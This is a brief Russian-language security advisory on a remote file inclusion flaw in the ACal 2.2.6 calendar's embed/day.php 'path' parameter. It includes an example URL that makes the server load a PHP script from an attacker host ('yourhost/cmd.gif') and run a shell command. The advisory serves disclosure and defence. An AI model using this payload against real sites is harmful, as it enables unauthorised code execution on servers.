Программа: ACal 2.2.6, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "path" в сценарии "embed/day.php". Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольный PHP
сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации
уязвимости опция "register_globals" должна быть включена.

Пример:

http://[url]/[calendar_path]/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls

 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии